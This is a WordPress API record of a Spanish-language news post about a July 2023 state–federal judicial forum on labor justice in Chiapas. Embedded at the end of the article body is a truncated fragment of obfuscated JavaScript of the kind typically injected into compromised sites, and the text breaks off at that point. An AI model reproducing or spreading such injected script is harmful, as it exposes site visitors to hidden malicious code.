{"id":10857,"date":"2023-07-05T04:49:34","date_gmt":"2023-07-05T04:49:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10857"},"modified":"2023-07-05T04:49:34","modified_gmt":"2023-07-05T04:49:34","slug":"realiza-poder-judicial-del-estado-conversatorio-en-materia-de-justicia-laboral-estatal-y-federal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10857","title":{"rendered":"Realiza Poder Judicial del Estado Conversatorio en Materia de Justicia Laboral Estatal y Federal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532479153-1024x771.jpg\" alt=\"\" class=\"wp-image-10858\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532479153-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532479153-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532479153-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532479153.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>04 de Julio del 2023. Dando continuidad a los trabajos colaborativos entre las Judicaturas Federal y Estatal, se llev\u00f3 a cabo el Conversatorio Reflexiones en Materia de Justicia Laboral y Burocr\u00e1tica, del cual fue sede el Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente del Tribunal Superior de Justicia y Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez.Acompa\u00f1ado del consejero de la Judicatura Federal, Alejandro Sergio Gonz\u00e1lez Bernab\u00e9 y del coordinador de Magistrados Federales en el Estado, Pedro Guerrero Trejo; el magistrado presidente Ramos P\u00e9rez brind\u00f3 un mensaje de bienvenida a las y los participantes, quienes se dieron cita en la Sala de Presidentes del Palacio de Justicia de Tuxtla Guti\u00e9rrez, donde record\u00f3 el compromiso de esta Instituci\u00f3n con la Reforma Laboral, al ser Chiapas una de las primeras entidades del pa\u00eds en asumir su implementaci\u00f3n, materializ\u00e1ndose en una realidad presente.A\u00f1adi\u00f3 que, a pesar de no haber sido una tarea f\u00e1cil, con la coordinaci\u00f3n y colaboraci\u00f3n respetuosa de los tres Poderes y la Federaci\u00f3n, as\u00ed como de la abogac\u00eda chiapaneca, se ha logrado consolidar esta Reforma, por lo que cobra especial relevancia la realizaci\u00f3n de estos encuentros entre juzgadoras y juzgadores federales y locales, para el intercambio de experiencias y buenas pr\u00e1cticas, que permitan robustecer el quehacer jurisdiccional en la construcci\u00f3n de una sociedad m\u00e1s justa y humana.Por su parte, el consejero de la Judicatura Federal, Gonz\u00e1lez Bernab\u00e9, realiz\u00f3 la declaratoria inaugural luego de agradecer el espacio brindado y enfatiz\u00f3 que la justicia laboral es fundamental para la protecci\u00f3n de los derechos de la ciudadan\u00eda, por lo que estas acciones garantizan la debida ejecuci\u00f3n a trav\u00e9s de criterios generados en la implementaci\u00f3n y el ejercicio constante de los juzgadores desde los \u00e1mbitos Local y Federal.Estuvieron en el presidium el magistrado en Materia de Trabajo del Vig\u00e9simo Circuito y moderador del Conversatorio, Luis Arturo Palacio Zurita; el juez de Distrito del Tribunal Laboral y coordinador de Jueces Federales, Mario Felipe Mata R\u00edos; la consejera de la Judicatura del Estado, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n y la jueza Segunda Especializada en Materia Laboral Tuxtla, Mar\u00eda Aurora Ruiz Ovalle.Como participantes del Conversatorio, acudieron Jueces y Magistrados Federales; Juezas y Jueces en Materia Laboral y Burocr\u00e1tica en el Estado y el Representante de la Junta Local de Conciliaci\u00f3n y Arbitraje en el Estado, quienes desarrollaron el programa durante rondas de preguntas, dirigidas a los Juzgadores Federales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>04 de Julio del 2023. Dando continuidad a los trabajos colaborativos entre las Judicaturas Federal y Estatal, se llev\u00f3 a cabo el Conversatorio Reflexiones en Materia de Justicia Laboral y Burocr\u00e1tica, del cual fue sede el Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente del Tribunal Superior de Justicia y Consejo de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10858,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10857","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10857","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10857"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10857\/revisions"}],"predecessor-version":[{"id":10859,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10857\/revisions\/10859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10858"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10857"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10857"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10857"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}